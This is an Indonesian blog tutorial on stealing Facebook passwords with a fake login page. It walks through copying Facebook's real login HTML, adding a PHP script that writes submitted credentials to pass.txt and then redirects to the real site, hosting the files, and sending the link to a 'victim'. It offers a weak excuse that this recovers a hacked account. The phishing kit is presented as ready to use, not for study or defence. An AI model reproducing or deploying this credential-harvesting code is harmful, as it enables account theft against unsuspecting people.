Script Hack FB Untuk Hack FB Dengan Fake Login 2024

Script Hack FB Untuk Hack FB dengan Fake Login - Kali kami akan membahasa lagi seputar tentang dunia per-hacker-an.

Ya mungkin kemarin-kemarin ini sudah sempat kami bahas mengenai cara hack akun Instagram orang lain.

Tapi untuk yang kali ini kami akan membagikan mengenai cara hack Facebook milik orang lain dengan menggunakan sebuah Script Hack Facebook.

Karena saat ini sedang ramai di bahasan mengenai Script Hack Facebook, yang dimana katanya dapat melakukan hack akun FB milik orang lain dengan mudah.

Nah, dari pada penasaran dan selalu bertanya-tanya, maka langsung saja berikut script hack FB untuk hack FB dengan fake login.

Script Hack FB Untuk Hack FB dengan Fake Login

Script Hack FB Untuk Hack FB Dengan Fake Login
Untuk bisa mengikuti atau melakukan cara hack Facebook yang kali ini, maka anda terlebih dahulu harus mengerti apa itu tentang hosting.

Hosting ini sering juga deisebuah dengan Sewa Hosting atau Web Hosting merupakan sebuah penyewaan lokasi buat bisa menampung semua data-data yang akan dibutuhkan eleh sebuah website.

Dan sehingga nantinya bisa untuk diakses melalui jaringan Internet, data yang ada disini bisa berupa jenis file, email, gambar, aplikasi/script.program dan juga database.

Nah natinya Fosting tersebut akan anda pakai disaat akan melakukan penyimpanan beberapa jenis file buat kebutuhan j]hack Facebook dengan menggunakan fake login ini.

Tidak usah berlama-lama, mari langsung saja kita mulai langkah-langkah cara hack dengan script hack FB untuk hack FB dengan fake login berikut ini:

1. Simpan Halaman untuk Login FB Resminya

Untuk langkah yang pertama ini harus dilakukan yakni dengancara mengunduh Facebook atau FB HTML kode, khsusunya buat halamn login yang resmi Facebook.


Berikut ini langkah-langkahnya:

Silahkan anda masuk ke dalam halamn login yang resmi FB melalui link yang berikut ini: KLIK DISINI.

Berikutnya anda klik sebelah kana di sembarangan tempat di dalam halaman login itu, lalu pilih Save As.

Berikutnya save di satu folder yang baru dan juga gampang untuk anda cari kemudian.



2. Unduh Script Hack Facebook

Untuk langkah yang kedua ini harus dilakukan yakni dengan cara mengunduh terlebih dahulu script cheat atau hack Facebook.

Anda bisa mengunduh script tersebut melalui link yang berikut: Script Facebook 

3. Menimpa untuk Script kode HTML ke Dalam Halaman Login yang Resmi FB dengan Menggunakan Script Hack Facebook

Jika sudah selesai anda mengunduh script hack FB untuk hack FB dengan fake login di langkah yang kedua di atas ini, maka langkah berikutnya salin.

Kemudian anda timpa file HTML halam login yang resmi Facebook yang sudah diperoleh di langkah yang pertama tadi.

4. Membuat Sebuah File Next.txt

Langkah berikutnya yakni anda salin script hacl Facebook yang terdapat di vawah ini ke dalam Notepad, kemudian save dengan menggunakan nama next.php.

Janga sampai anda lupa buat menaruh file tersebut di dalam satu folder yang sama dengan langkah pertama yang di atas oke.
<?php header('Location: http://www.Facebook.com/login.php'); $handle = fopen('pass.txt', 'a'); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>

5. Membuat Sebuah File untuk Penampungan Username dan Kata Sandi si Target

Berikutnya anda buat sebuah file berektstensi txt dengan memakai Notepad, kemudian save dengan menggunakan nama pass.txt.

6. Hosting Seluruh File Script Hack Facebook

Langkah yang berikutnya sesudah anda selesai mengumpulkan semua file tersebut di langkah yang pertama hingga langkah yang kelima diatas, yakni dengan melakukan Hosting semua file-file tersebut.

Beberapa daftar nama file script hack FB untuk hack FB dengan fake login yang akan kami unggah atau melakukan hosting yakni:
  • Masuk ke Dalam FB_FB_files;
  • Masuk ke Dalam fb_FB.HTML;
  • Pass.text
  • Next.php;
Anda bisa mengunggah script hack FB tersebut lewat github buat melakukan hosting file tersebut dengan gratis.


7. Menyebarkan Sebuah Link ke Halaman Masuk FB

Sesudah anda melakukan hosting semua file script hack Facebook di langkah yang ke enam barusan, maka silahkan untuk anda salin link halaman masuk FB tersebut yang hasil dari hosting.

Nah untuk link halaman masuk ke dalam FB yang anda peroleh dari hasil proses Hosting itulah yang nantinya anda berikan atau kirimkan kepada si korban atau si targetmu.

Ketiga si koban atau target tersebut login ke dalam akun FB dengan memakai link halaman dari fake llogin FB yang sudah anda kirimkan tadi.

Maka secara otomatis username dan kata sandi FB si target atau korban akan langsung tersimpan di dalam file pass.tkt yang sudah anda hosting barusan.

Demikianlah cara melakukan hack Facebook atau FB dengan menggunakan fake login memakai script hack Facebook atau FB yang sudah bisa anda terapkan di rumah.

Cara yang kali ini bisa dimanfaatkan buat anda memperoleh lagi akun Facebook mu yang sebelmunya sudah di hack atau di sadap.

Anda tinggal kirimka saja link dari fake login ini kepada sesorang yang sedang anda curigai sudah melakukan hack akun Facebook.

Itulah seluruh bahasan kami di artikel kali ini tentang script hack FB untuk hack FB dengan fake login. Sekian dan selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel